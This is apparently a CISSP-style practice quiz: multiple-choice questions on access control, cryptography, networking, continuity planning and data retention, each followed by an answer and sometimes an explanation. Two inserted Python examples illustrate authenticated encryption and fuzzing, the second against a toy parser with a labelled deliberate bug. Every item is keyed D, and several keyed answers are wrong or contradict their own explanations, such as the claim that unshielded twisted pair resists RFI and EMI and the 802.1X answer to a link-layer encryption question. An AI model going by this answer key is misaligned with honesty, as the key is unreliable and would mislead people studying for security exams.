How might one test adherence to the user accounts policy? A. User self-reporting B. Penetration testing C. Management review D. User records auditing

D. A records audit can verify that users have acknowledged acceptance of the policy, that accounts of departed users have been suspended, that users have the appropriate access to information, and many other aspects of the policy.

Which of the following best describes a certificate authority? A. An organization that issues private keys and the corresponding algorithms B. An organization that validates encryption processes C. An organization that verifies encryption keys D. An organization that issues certificates

D. A registration authority (RA) accepts a person's request for a certificate and verifies that person's identity. Then the RA sends this request to a certificate authority (CA), which generates and maintains the certificate.

Emily is listening to network traffic and capturing passwords as they are sent to the authentication server. She plans to use the passwords as part of a future attack. What type of attack is this? A. Brute-force attack B. Dictionary attack C. Social engineering attack D. Replay attack

D. A replay attack occurs when an intruder obtains and stores information and later uses it to gain unauthorized access. In this case, Emily is using a technique called electronic monitoring (sniffing) to obtain passwords being sent over the wire to an authentication server. She can later use the passwords to gain access to network resources. Even if the passwords are encrypted, the retransmission of valid credentials can be sufficient to obtain access.

Which is the best software architecture that Sandy should introduce her team to for effective business application use? A. Distributed component object architecture B. Simple Object Access Protocol architecture C. Enterprise JavaBeans architecture D. Service-oriented architecture

D. A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.

Which of the following incorrectly describes the concept of executive succession planning? A. Predetermined steps protect the company if a senior executive leaves. B. Two or more senior staff cannot be exposed to a particular risk at the same time. C. It documents the assignment of deputy roles. D. It covers assigning a skeleton crew to resume operations after a disaster.

D. A skeleton crew consists of the employees who carry out the most critical functions following a disaster. They are put to work first during the recovery process. A skeleton crew is not related to the concept of executive succession planning, which addresses the steps that will be taken to fill a senior executive role should that person retire, leave the company, or die. The objective of a skeleton crew is to maintain critical operations, while the objective of executive succession planning is to protect the company by maintaining leadership roles.

There are different ways that specific technologies can create one-time passwords for authentication purposes. What type of technology is illustrated in the graphic that follows? A. Counter synchronous token B. Asynchronous token C. Mandatory token D. Synchronous token

D. A synchronous token device synchronizes with the authentication service by using time or a counter as the core piece of the authentication process. If the synchronization is time based, as shown in this graphic, the token device and the authentication service must hold the same time within their internal clocks. The time value on the token device and a secret key are used to create the one-time password, which is displayed to the user. The user enters this value and a user ID into the computer, which then passes them to the server running the authentication service. The authentication service decrypts this value and compares it to the value it expected. If the two match, the user is authenticated and allowed to use the computer and resources.

What are the two general types of proximity identification devices? A. Biometric devices and access control devices B. Swipe card devices and passive devices C. Preset code devices and wireless devices D. User-activated devices and system sensing devices

D. A user-activated device requires the user to do something: swipe the card through the reader and/or enter a code. A system sensing device recognizes the presence of the card and communicates with it without the user needing to carry out any activity.

Before monitoring employees' activities, all of the following steps must be taken, except: A. A policy must be established. B. A policy must be distributed to all employees. C. Monitoring must be executed in a consistent manner. D. A warning system must be implemented as part of a trial phase.

D. A warning system must be implemented as part of a trial phase.

Which of the following is true regarding data retention requirements? A. Legal requirements for data retention are uniform across all regulated business sectors, and must be followed to reduce risk of criminal litigation. B. To comply with various data retention regulations, it is best to retain all data to the lengthiest legal requirements. C. Retaining the largest amount of data possible makes responding to electronic discovery (e-discovery) orders easier and more straightforward. D. A well-documented policy for the retention of data is a minimum but necessary component of regulatory compliance.

D. A well-documented policy for the retention of data is a minimum but necessary component of regulatory compliance.

An access control matrix is used in many operating systems and applications to control access between subjects and objects. What is the column in this type of matrix referred to as? A. Capability table B. Constrained interface C. Role-based value D. ACL

D. Access control lists (ACLs) map values from the access control matrix to the object. Whereas a capability corresponds to a row in the access control matrix, the ACL corresponds to a column of the matrix. ACLs are used in several operating systems, applications, and router configurations. They are lists of subjects that are authorized to access specific objects, and they define what level of authorization is granted. Authorization can be specified to an individual or group. So the ACL is bound to an object and indicates which subjects can access it, and a capability table is bound to a subject and indicates which objects that subject can access.

Which of the following are key elements of secure coding practices? A. Using object-oriented languages instead of procedural ones, and heeding compiler warnings B. Ensuring that quality assurance is thorough, and performed by multiple teams C. Parallel programming, agile methodologies, and iterative testing D. Validating inputs, adhering to the least privilege principle, and keeping code as simple as possible

D. According to the Carnegie Mellon University's Software Engineering Institute (SEI), the "top 10" secure coding practices (as of May 2018) include these three items, as well as the following seven others: heeding compiler warnings; architecting and designing for security policies; default deny; sanitizing outputs; practicing defense in depth; using effective quality assurance techniques; and adopting a secure coding standard.

What process usually takes place after creating a DES session key? A. Key signing B. Key escrow C. Key clustering D. Key exchange

D. After a session key has been created, it must be exchanged securely. In most cryptosystems, an asymmetric key (the receiver's public key) is used to encrypt this session key, and it is sent to the receiver.

One of the actions that attackers typically attempt after compromising a system is to acquire the ability to mimic a normal privileged user. What is one way in which they may accomplish this? A. Rebooting the compromised host B. Exporting the password hash table C. Pivoting from the compromised host to another target D. Adding a privileged user account

D. After compromising a host, attackers may attempt a number of actions, but will typically attempt to blend in by acquiring administrative privileges. They can do this by either compromising a privileged account, adding a privileged account, or elevating the privileges of the account they compromised.

Gizmos and Gadgets has restored its original facility after a disaster. What should be moved in first? A. Management B. Most critical systems C. Most critical functions D. Least critical functions

D. After the primary site has been repaired, the least critical components are moved in first. This ensures that the primary site is really ready to resume processing. By doing this, you can validate that environmental controls, power, and communication links are working properly. It can also avoid putting the company into another disaster. If the less critical functions survive, then the more critical components of the company can be moved over.

Linda has found out that two people who work for her who do not have the clearance level to know about certain military troop movements have learned about the activity and sold the information to enemy states. Which of the following best describes the type of issue Linda is dealing with? A. Fraud. B. Phishing C. Pharming D. Aggregation.

D. Aggregation.

How is interface testing different from misuse case testing? A. Interface testing is intended to determine correct function, whereas misuse case testing is intended to determine error conditions. B. Interface testing is intended to determine the usability, whereas misuse case testing is intended to determine when misuse has occurred. C. Interface testing and misuse case testing are essentially the same. D. Interface testing is intended to determine correct function, whereas misuse case testing is intended to determine if an error condition could be problematic.

D. All apps must undergo interface testing to be properly functional and usable. But they should also undergo misuse case testing in order to determine whether an intentional misuse of them could result in an error that subverts the confidentiality, integrity, and availability of the data the app provides access to.

What is the value of layering security responsibility? A. Spreads accountability across the organization. B. Focuses specific responsibilities on the roles best able to accomplish them. C. Ensures separation of duties and encourages oversight. D. All of these choices.

D. All of these choices.

What are the key stages of account management? A. Provisioning or adding accounts, modifying accounts, and suspending accounts B. Adding accounts, deleting accounts, and deleting users' data C. Verifying account passwords, validating account usage, and deleting accounts D. Provisioning accounts, modifying accounts, auditing the use of accounts, and suspending accounts

D. All stages in the life cycle of authenticated access should be accounted for. Access should not be granted without appropriate direction, nor should access be allowed or denied without expected permissions. And the suspension of access should be auditable as well.

Integrity is a primary concept in many security models and policies. Which of the following statements is not consistent with the rules of integrity? A. Approved subjects should never make unapproved modifications. B. The system should deal with internal and external activity the same way. C. Unapproved subjects should never be allowed to make changes. D. All subjects must have a need-to-know.

D. All subjects must have a need-to-know.

During which phase or phases of the information life cycle can cryptography be an effective control? A. Use B. Archival C. Disposal D. All the above

D. All the above

Which of the following requirements should the data retention policy address? A. Legal B. Regulatory C. Operational D. All the above

D. All the above

The trusted computing base (TCB) contains which of the following? A. All trusted processes and software components B. All trusted security policies and implementation mechanisms C. All trusted software and design mechanisms D. All trusted software and hardware components

D. All trusted software and hardware components

Which of the following is not used for turning source code into machine or object code? A. Assembler B. Interpreter. C. Compiler. D. Analyzer.

D. Analyzer.

All of the following could be used to prevent shoulder surfing, except: A. Strategically placed monitors B. Awareness training C. High-walled cubicles D. Anti-emanation materials

D. Anti-emanation materials

SMTP lives at which OSI layer? A. Session B. Transmission C. Network D. Application.

D. Application.

The type of token device that employs a challenge response mechanism is which of the following? A. one-time password generator B. Token generator C. Synchronous D. Asynchronous

D. Asynchronous

The importance of protecting audit logs generated by computers and network devices is highlighted by the fact that it is required by many of today's regulations. Which of the following does NOT explain why audit logs should be protected? A. If not properly protected, these logs may not be admissible during a prosecution. B. Audit logs contain sensitive data and should only be accessible to a certain subset of people. C. Intruders may attempt to scrub the logs to hide their activities. D. The format of the logs should be unknown and unavailable to the intruder.

D. Auditing tools are technical controls that track activity within a network, on a network device, or on a specific computer. Even though auditing is not an activity that will deny an entity access to a network or computer, it will track activities so that a security administrator can understand the types of access that took place, identify a security breach, or warn the administrator of suspicious activity. This information can be used to point out weaknesses of other technical controls and help the administrator understand where changes must be made to preserve the necessary security level within the environment. Intruders can also use this information to exploit those weaknesses, so audit logs should be protected through permissions, rights, and integrity controls, as in hashing algorithms. However, the format of systems logs is commonly standardized with all like systems. Hiding log formats is not a usual countermeasure and is not a reason to protect audit log files.

Which of the following provides an incorrect definition of the specific component or protocol that makes up IPSec? A. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks. B. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity. C. Internet Security Association and Key Management Protocol provides a framework for security association creation and key exchange. D. Internet Key Exchange provides authenticated keying material for use with encryption algorithms.

D. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity. Internet Security Association and Key Management Protocol provides a framework for security association creation and key exchange. Internet Key Exchange provides authenticated keying material for use with ISAKMP.

The operations team is responsible for defining which data gets backed up and how often. Which type of backup process backs up files that have been modified since the last time all data was backed up? A. Incremental process B. Full backup C. Partial backup D. Differential process

D. Backups can be full, differential, or incremental, and are usually used in some type of combination with each other. Most files are not altered every day, so to save time and resources, it is best to devise a backup plan that does not continually back up data that has not been modified. Backup software reviews the archive bit setting when making its determination on what gets backed up and what does not. If a file is modified or created, the file system sets the archive bit to 1, and the backup software knows to back up that file. A differential process backs up the files that have been modified since the last full backup; in other words, the last time all the data was backed up. When the data needs to be restored, the full backup is laid down first, and then the differential backup is put down on top of it.

Use the following scenario to answer Questions 30-32. Susan has been told by her boss that she will be replacing the current security manager within her company. Her boss explained to her that operational security measures have not been carried out in a standard fashion, so some systems have proper security configurations and some do not. Her boss needs to understand how dangerous it is to have some of the systems misconfigured, along with what to do in this situation. Which of the following best describes what Susan needs to ensure the operations staff creates for proper configuration standardization? A. Dual control B. Redundancy C. Training D. Baselines

D. Baselines

What should Don's team put into place to stop the masquerading attacks that have been taking place? A. Dynamic packet-filtering firewall B. ARP spoofing protection C. Disable unnecessary ICMP traffic at edge routers D. SRPC

D. Basic RPC does not have authentication capabilities, which allows for masquerading attacks to take place. Secure RPC (SRPC) can be implemented, which requires authentication to take place before remote systems can communicate with each other. Authentication can take place using shared secrets, public keys, or Kerberos tickets.

Which of the following statements with respect to facial scans for biometric authentication is NOT true? A. A facial scan can be based on the unique structures of a face, including bone structure, eye widths, chin shapes, etc., via visual imagery. B. A facial scan can be based on the unique pattern of heat emitted from an individual's face, which is itself based on a unique pattern of small blood vessels (capillaries) just beneath the surface of the skin. C. A facial scan can be based on the three-dimensional measurements of the topology of the face, using projection of infrared dots. D. Because of the various ways that facial scans can be performed, they are virtually impossible to forge or spoof.

D. Because of the various ways that facial scans can be performed, they are virtually impossible to forge or spoof.

The Control Objectives for Information and Related Technology (COBIT) is a framework and set of best practices. Which of the following provides an incorrect characteristic of COBIT? A. Developed by the Information Systems Audit and Control Association (ISACA) and the IT Governance Institute (ITGI). B. It defines the goals for the controls that should be used to properly manage IT and to ensure that IT maps to business needs. C. A majority of regulation compliance and audits are built on the COBIT framework. D. COBIT is broken down into five domains.

D. COBIT 4.1 is broken down into four domains (Plan and Organize, Acquire and Implement, Deliver and Support, Monitor and Evaluate), not five; the other three statements are correct characteristics of COBIT.

What type of computer memory improves system performance by acting as a special storage area for information that is retrieved often? A. primary B. virtual C. RAM D. Cache.

D. Cache.

Which of the following is the best way for Susan to illustrate to her boss the dangers of the current configuration issues? A. Map the configurations to the compliancy requirements. B. Compromise a system to illustrate its vulnerability. C. Audit the systems. D. Carry out a risk assessment.

D. Carry out a risk assessment.

Protecting evidence and providing accountability for who handled it at different steps during the investigation is referred to as what? A. Rule of best evidence. B. Hearsay. C. Evidence safety. D. Chain of custody.

D. Chain of custody.

Which of the following is not a reason why data should be classified? A. Classification forces valuation, which can be used to determine risk. B. Classification is required to determine appropriate access controls. C. Classification can be used to optimize security budget. D. Classification is required to develop secure systems.

D. Classification is required to develop secure systems.

Which of the following is not a necessary characteristic of a Kerberos implementation? A. Transparent. B. Scalable. C. Reliable. D. Cohesive.

D. Cohesive.

The least expensive and most difficult to test computer recovery site is a: A. non-mobile hot site. B. mobile hot site. C. warm site. D. Cold site.

D. Cold site.

John is asked by his manager to research an IDS for a new dispatching center. In his research, he finds the top five products and compares them against each other based upon their ratings. In order to get the most simplified and universal evaluation, which of the following should John use to make his decision? A. Red Book B. ITSEC C. Orange Book D. Common Criteria.

D. Common Criteria.

Which of the following statements correctly describes biometric methods? A. They are the least expensive and provide the most protection. B. They are the most expensive and provide the least protection. C. They are the least expensive and provide the least protection. D. They are the most expensive and provide the most protection.

D. Compared with the other available authentication mechanisms, biometric methods provide the highest level of protection and are the most expensive.

What is the main drawback of endpoint data leak protection (EDLP)? A. inspection B. Encryption C. Evasion D. Complexity.

D. Complexity.

Which of the following activities does the IAB consider a violation of "Ethics and the Internet"? A. Creating a computer virus. B. Selling a worm. C. Installing a honeypot. D. Compromising the privacy of users.

D. Compromises the privacy of users.

When implementing data leak prevention, which is the first, most critical step? A. Examine the flow of sensitive data in your organization to better understand what is proper and what should not be allowed. B. Conduct a risk assessment to determine what the best data protection strategy will be for your organization. C. Evaluate the features of the available products in order to determine which fits best in your organization's infrastructure. D. Conduct an inventory of all the data in your organization in order to characterize and prioritize its sensitivity.

D. Conduct an inventory of all the data in your organization in order to characterize and prioritize its sensitivity.

What is configuration management used for in many environments? A. controlling changes in testing procedures. B. controlling testing environments and documentation of testing. C. Ensuring changes in design and its verification process, testing, and implementation. D. Controlling changes in design and its verification of process, testing, and implementation.

D. Controlling changes in design and its verification of process, testing, and implementation.

Which of the following are services that cryptosystems can provide? A. Confidentiality, integrity, and availability B. Computation, authentication, and authorization C. Integrity, authentication, and accounting D. Confidentiality, integrity, and authentication

D. Cryptosystems can render data unintelligible except to authorized entities (confidentiality), can validate that data has not been altered (integrity), and can validate the identity of an entity (authentication).

How is it possible that anyone can know how a specific algorithm works and it can still provide protection through secrecy? A. The source code is not provided. B. The S-boxes are continually changed through the use of initialization vectors. C. No one has access to the keystream. D. Cryptovariables provide the secrecy.

D. Cryptovariables (the keys) provide the secrecy. The algorithm can be fully public; only the key must remain secret.
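The two answers above (the three services a cryptosystem provides, and the fact that a public algorithm protects data as long as the key is secret) are easier to see in running code. The block below is an added example, not from the original page: an encrypt-then-MAC construction built only from the Python standard library, with HMAC-SHA256 used as a PRF in counter mode for the keystream and again as the authentication tag. The master key, nonce size and sample plaintext are constructed for the demo. It is illustrative of the services, not a substitute for a vetted AEAD such as AES-GCM or ChaCha20-Poly1305.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Added example, not part of the original page: a minimal encrypt-then-MAC
# scheme from the standard library, showing confidentiality (ciphertext hides
# the plaintext), integrity (any modification is rejected) and authentication
# (only a holder of the key could have produced a valid tag). Everything about
# the algorithm is visible here; the secrecy lives entirely in the key.
# Not a replacement for a vetted AEAD cipher in production.

NONCE_LEN = 16
TAG_LEN = hashlib.sha256().digest_size  # 32


def derive_keys(master_key: bytes) -> Tuple[bytes, bytes]:
    """Split one master key into independent encryption and MAC keys."""
    k_enc = hmac.new(master_key, b"enc", hashlib.sha256).digest()
    k_mac = hmac.new(master_key, b"mac", hashlib.sha256).digest()
    return k_enc, k_mac


def keystream(k_enc: bytes, nonce: bytes, length: int) -> bytes:
    """PRF in counter mode: HMAC(k_enc, nonce || counter) per 32-byte block."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(k_enc, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(master_key: bytes, plaintext: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Return nonce || ciphertext || tag; the tag covers nonce and ciphertext."""
    if nonce is None:
        nonce = os.urandom(NONCE_LEN)
    k_enc, k_mac = derive_keys(master_key)
    ks = keystream(k_enc, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, ks))
    tag = hmac.new(k_mac, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def decrypt(master_key: bytes, blob: bytes) -> bytes:
    """Verify the tag in constant time before touching the ciphertext;
    raise on a modified message or a wrong key."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("message too short")
    nonce, ciphertext, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    k_enc, k_mac = derive_keys(master_key)
    expected = hmac.new(k_mac, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: wrong key or modified ciphertext")
    ks = keystream(k_enc, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, ks))


def tamper_detected(master_key: bytes, blob: bytes) -> bool:
    """Flip one ciphertext bit and report whether decrypt() rejects it (integrity)."""
    broken = bytearray(blob)
    broken[NONCE_LEN] ^= 0x01
    try:
        decrypt(master_key, bytes(broken))
        return False
    except ValueError:
        return True


def wrong_key_detected(master_key: bytes, blob: bytes) -> bool:
    """Decrypting under a different key must fail (authentication)."""
    other = bytes(b ^ 0xFF for b in master_key)
    try:
        decrypt(other, blob)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    key = os.urandom(32)                       # the only secret in the system
    msg = b"constructed sample plaintext"      # constructed input
    blob = encrypt(key, msg)
    print("plaintext visible in blob:", msg in blob)   # confidentiality
    print("round trip ok:", decrypt(key, blob) == msg)
    print("tamper rejected:", tamper_detected(key, blob))      # integrity
    print("wrong key rejected:", wrong_key_detected(key, blob))  # authentication
```

The check order in decrypt() is the point a practitioner should carry away: the tag is verified with a constant-time comparison before any decryption happens, so a modified message or a message from someone without the key never reaches the code that would act on it.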

Alice needs to hire a third party to conduct a test of her company's security posture. If she needs to demonstrate that her company is compliant with the payment card industry's requirements for the protection of cardholder data, which of the following services should she select? A. Vulnerability assessment. B. Penetration test. C. Regulatory Audit. D. DSS Audit.

D. DSS Audit.

What layer does a bridge work at? A. session B. network C. transport D. Data link

D. Data link

A transition into the disposal phase of the information life cycle is most commonly triggered by A. Senior management B. Insufficient storage C. Acceptable use policies D. Data retention policies

D. Data retention policies

What does the term "data at rest" refer to, and how is it best protected? A. Data that is not being actively used, though it is encrypted during use. B. Data that may be in use, but is decrypted on disk so that it is accessible. C. Data that may be used later, and so is stored decrypted for when it is needed. D. Data that is not being actively used, and is encrypted while static.

D. Data that is not being actively used, and is encrypted while static.

Which of the following is the LEAST important stage in the life-cycle management of information? A. Data specification and classification B. Continuous monitoring and auditing of data access. C. Data archival D. Database migration.

D. Database migration.

Which is not one of the primary goals of BIA? A. Criticality prioritization B. Downtime estimation C. Determining requirements for critical business functions. D. Deciding on various tests to be performed to validate the business continuity plan.

D. Deciding on various tests to be performed to validate the business continuity plan.

An outline for a physical security design should include program categories and the necessary countermeasures for each. What category do locks and access controls belong to? A. Assessment. B. Deterrence. C. Response. D. Delay.

D. Delay.

The crafting of malformed packets, packet flooding, and ransomware are all potentially which of the following forms of network attack? A. Buffer overflows. B. Polymorphic worms. C. Source Spoofing. D. Denial of Service.

D. Denial of Service.

A physical security program needs to be developed and maintained in a defense-in-depth model. Which of the following contain the necessary categories of a physical security program? A. Deterrence, Delaying, Prevention, Assessment, Response. B. Deterrence, Delaying, Detection, Analysis, Response. C. Deterrence, Delaying, Detection, Assessment, Recover, D. Deterrence, Delaying, Detection, Assessment, Response.

D. Deterrence, Delaying, Detection, Assessment, Response.

Which of the following describes a best practice for provisioning a new desktop system or server? A. Begin with pristine installation media for the latest version of the operating system, and then apply all necessary patches to bring it to the current revision. B. Clone the new system from an existing system already patched to the latest revision that is functioning properly in deployment. C. Determine which services the new system requires, and enable only those for which there is a business need, on a case-by-case basis. D. Develop a hardened gold master and use it as the basis of all newly provisioned systems.

D. Develop a hardened gold master and use it as the basis of all newly provisioned systems.

Capability Maturity Model Integration (CMMI) is a process improvement approach that is used to help organizations improve their performance. The CMMI model may also be used as a framework for appraising the process maturity of the organization. Which of the following is an incorrect mapping of the levels that may be assigned to an organization based upon this model? i. Maturity Level 2 - Managed or Repeatable ii. Maturity Level 3 - Defined iii. Maturity Level 4 - Quantitatively Managed iv. Maturity Level 5 - Optimizing A. i B. i, ii C. All of them D. None of them

D. Each answer provides the correct definition of the four levels that can be assigned to an organization during its evaluation against the CMMI model. This model can be used to determine how well the organization's processes compare to CMMI best practices, and to identify areas where improvement can be made. Maturity Level 1 is Initial.

Which best describes the purpose of the ALE calculation? A. Quantifies the security level of the environment B. Estimates the loss possible for a countermeasure C. Quantifies the cost/benefit result D. Estimates the loss potential of a threat in a span of a year

D. Estimates the loss potential of a threat in a span of a year

Which of the following best describes the mitigation of data remanence by a physical destruction process? A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's B. Converting the 1's and 0's that represent data with the output of a cryptographic function C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes D. Exposing storage media to caustic or corrosive chemicals that render it unusable

D. Exposing storage media to caustic or corrosive chemicals that render it unusable

Choose the answer that has the correct definitions for False Rejection Rate and False Acceptance Rate. A. False Acceptance Rate is a Type I error and False Rejection Rate is a Type II error. B. False Acceptance Rate is the number of authorized individuals who were improperly rejected and False Rejection Rate is a Type I error. C. False Rejection Rate is a Type I error and False Acceptance Rate is the number of impostors who were rejected. D. False Rejection Rate is the number of authorized users who were improperly rejected and the False Acceptance Rate is a Type II error.

D. False Rejection Rate is the amount of authorized users who were improperly rejected and the False Acceptance Rate is a Type II error.

Use the following scenario to answer Questions 25-27. Lenny is a new security manager for a retail company that is expanding its functionality to its partners and customers. The company's CEO wants to allow its partners' customers to be able to purchase items through the company's web stores as easily as possible. The CEO also wants the company's partners to be able to manage inventory across companies more easily. The CEO wants to be able to understand the network traffic and activities in a holistic manner, and he wants to know from Lenny what type of technology should be put into place to allow for a more proactive approach to stopping malicious traffic if it enters the network. The company is a high-profile entity constantly dealing with zero-day attacks. Which of the following is the best identity management technology that Lenny should consider implementing to accomplish some of the company's needs? A. LDAP directories for authoritative sources B. Digital identity provisioning C. Active Directory D. Federated identity

D. Federated identity allows the company and its partners to share customer authentication information. When a customer authenticates to a partner website, that authentication information can be passed to the retail company, so when the customer visits the retail company's website, the user has to submit less user profile information and the authentication steps the user has to go through during the purchase process could potentially be reduced. If the companies have an established trust model and share the same or similar federated identity management software and settings, this type of structure and functionality is possible.

Which of the following is most resistant to the physical environment? A. Infrared. B. Free space optics C. Satellite D. Fiber Optics.

D. Fiber Optics.

Dispersion is a condition that affects which cabling type? A. Twisted pair. B. Broadband coaxial C. Directional Antennae D. Fiber optics.

D. Fiber optics.

Bob has successfully tested the enterprise's business continuity plan (BCP) in various ways, and now is tasked with performing the most rigorous test to assure its viability. Which of the following will provide this? A. Structured walk-through test. B. Simulation test. C. Parallel test. D. Full-interruption test.

D. Full-interruption test.

Code reviews include all of the following except A. Ensuring the code conforms to applicable coding standards B. Discussing bugs, design issues, and anything else that comes up about the code C. Agreeing on a "disposition" for the code D. Fuzzing the code

D. Fuzzing is a technique for detecting flaws in the code by bombarding it with massive amounts of random data. This is not part of a code review, which focuses on analyzing the source code, not its response to random data.
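To make the distinction concrete, here is an added example (not from the original page) of what "bombarding code with random data" looks like: a small mutation-based fuzzer run against a constructed TLV parser that carries a deliberate, documented flaw. A code review reads parse_tlv and may or may not spot the unchecked index; the fuzzer never reads it, it just generates inputs until one crashes. All names, the record format and the seed input are hypothetical.

```python
import random
from typing import Callable, List, Tuple

# Added example, not part of the original page: a mutation fuzzer and a
# constructed target. parse_tlv() carries one deliberate, documented flaw so
# that the fuzzer has something to find; nothing here is a real parser.


def parse_tlv(data: bytes) -> List[Tuple[int, bytes]]:
    """Constructed target. Records are [type:1][length:1][value:length].
    Deliberate flaw: for type 2 the parser reads value[0] and value[1]
    without checking that the declared length was really present, so a
    truncated or mis-sized type-2 record raises IndexError instead of the
    documented ValueError."""
    records = []
    i = 0
    while i < len(data):
        if i + 2 > len(data):
            raise ValueError("truncated header")      # the documented rejection path
        rtype, length = data[i], data[i + 1]
        value = data[i + 2 : i + 2 + length]           # silently short when truncated
        if rtype == 2:
            _checksum = value[0] ^ value[1]            # crashes when len(value) < 2
        records.append((rtype, value))
        i += 2 + length
    return records


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """One random mutation: bit flip, byte overwrite, byte insert or truncation."""
    buf = bytearray(seed)
    choice = rng.randrange(4)
    if choice == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif choice == 1 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif choice == 2:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    else:
        buf = buf[: rng.randrange(len(buf) + 1)]
    return bytes(buf)


def fuzz(target: Callable[[bytes], object], seeds: List[bytes],
         iterations: int, seed: int = 1) -> List[Tuple[bytes, str]]:
    """Feed mutated inputs to the target. ValueError is the documented way to
    reject bad input; any other exception is a finding. Inputs the target
    accepts are added to the corpus so later mutations explore deeper."""
    rng = random.Random(seed)            # fixed seed: findings reproduce
    corpus = list(seeds)
    findings: List[Tuple[bytes, str]] = []
    for _ in range(iterations):
        candidate = mutate(rng.choice(corpus), rng)
        try:
            target(candidate)
        except ValueError:
            continue
        except Exception as exc:         # anything else is a crash worth a report
            findings.append((candidate, type(exc).__name__))
            continue
        corpus.append(candidate)
    return findings


# Constructed seed: one type-1 record "ABC" and one type-2 record 0x10 0x20.
SEED_INPUTS = [bytes([1, 3, 0x41, 0x42, 0x43, 2, 2, 0x10, 0x20])]

if __name__ == "__main__":
    hits = fuzz(parse_tlv, SEED_INPUTS, iterations=2000)
    print(f"{len(hits)} crashing inputs found")
    if hits:
        print("first reproducer:", hits[0][0].hex(), hits[0][1])
```

The harness separates the parser's documented rejection (ValueError) from everything else, which is what turns random input into an actionable finding; and because the RNG is seeded, each crashing input is a reproducer a developer can run directly, which is the handoff from fuzzing back into code review.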

Which of the following is not true of a circuit-switched network? A. Acts as a dedicated virtual connection. B. Is connection-oriented. C. Usually carries voice traffic. D. Has variable delays.

D. Has variable delays.

Use the following scenario to answer Questions 33-35. Tom's company has been experiencing many issues with unauthorized sniffers being installed on the network. One reason is because employees can plug their laptops, smartphones, and other mobile devices into the network, any of which may be infected and have a running sniffer that the owner is not aware of. Implementing VPNs will not work because all of the network devices would need to be configured for specific VPNs, and some devices, as in their switches, do not have this type of functionality available. Another issue Tom's team is dealing with is how to secure internal wireless traffic. While the wireless access points can be configured with digital certificates for authentication, pushing out and maintaining certificates on each wireless user device is cost prohibitive and will place too much of a burden on the network team. Tom's boss has also told him that the company needs to move from a landline metropolitan area network solution to a wireless solution. What should Tom's team implement to provide source authentication and data encryption at the data link level? A. IEEE 802.1AR B. IEEE 802.1AE C. IEEE 802.1AF D. IEEE 802.1X

D. IEEE 802.1AR provides a unique ID for a device. IEEE 802.1AE provides data encryption, integrity, and origin authentication functionality. IEEE 802.1AF carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an IEEE 802.1X EAP-TLS framework. A recent version (802.1X-2010) has integrated IEEE 802.1AE and IEEE 802.1AR to support service identification and optional point-to-point encryption.

IPSec's main protocols are AH and ESP. Which of the following services does AH provide? A. Confidentiality and authentication B. Confidentiality and availability C. Integrity and accessibility D. Integrity and authentication

D. IPSec is made up of two main protocols, Authentication Header (AH) and Encapsulating Security Payload (ESP). AH provides system authentication and integrity, but not confidentiality or availability. ESP provides system authentication, integrity, and confidentiality, but not availability. Nothing within IPSec can ensure the availability of the system it is residing on.

Which is not a benefit of the Diameter Protocol? A. Allows for different services to be authenticated in one architecture instead of individual architectures. B. Allows for the use of mobile IP in existing environments C. Relieves the restriction of only being able to authenticate users over PPP and SLIP connections. D. Increases customer cost because of the different policy servers that must be maintained.

D. Increases customer cost because of the different policy servers that must be maintained.

Erasure is required at the end of the media life cycle if the media contains sensitive information. Which of the following best describes purging? A. Changing the polarization of the atoms on the media. B. It is unacceptable when media are to be reused in the same physical environment for the same purposes. C. Data formerly on the media is made unrecoverable by overwriting it with a pattern. D. Information is made unrecoverable, even with extraordinary effort.

D. Information is made unrecoverable, even with extraordinary effort.

What is the term used to describe the systematic evaluation of the exchange points between a graphical data system and the system's user? A. Black box testing. B. Administrative testing. C. Stress testing. D. Interface testing.

D. Interface Testing.

Which of the following is not a concern of a security professional considering the adoption of Internet of Things (IoT) devices? A. Weak or nonexistent authentication mechanisms B. Vulnerability of data at rest and data in motion C. Difficulty of deploying patches and updates D. High costs associated with connectivity

D. IoT devices run the gamut of cost, from the very cheap to the very expensive. Cost, among the listed options, is the least likely to be a direct concern for a security professional. Lack of authentication, encryption, and update mechanisms are much more likely to be significant issues in any IoT adoption plan.

What is the Network Time Protocol (NTP), and why is it important in security assessments? A. It is a peer-to-peer protocol for system time synchronization, and it is important to ensure that peer systems' time-based authentication functions properly. B. It is a client/server protocol for system time synchronization, and it is important to ensure that peer systems' time-based authentication functions properly. C. It is a peer-to-peer protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems. D. It is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

D. It is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

Which of the following statements is true with respect to unshielded twisted pair (UTP) cabling? A. it is resistant to radio frequency interference (RFI) but not electromagnetic interference (EMI) B. It is resistant to electromagnetic interference (EMI) but not radio frequency interference (RFI) C. it is resistant to neither RFI nor EMI because it is not shielded. D. It is resistant to both RFI and EMI even though it is unshielded.

D. It is resistant to both RFI and EMI even though it is unshielded.

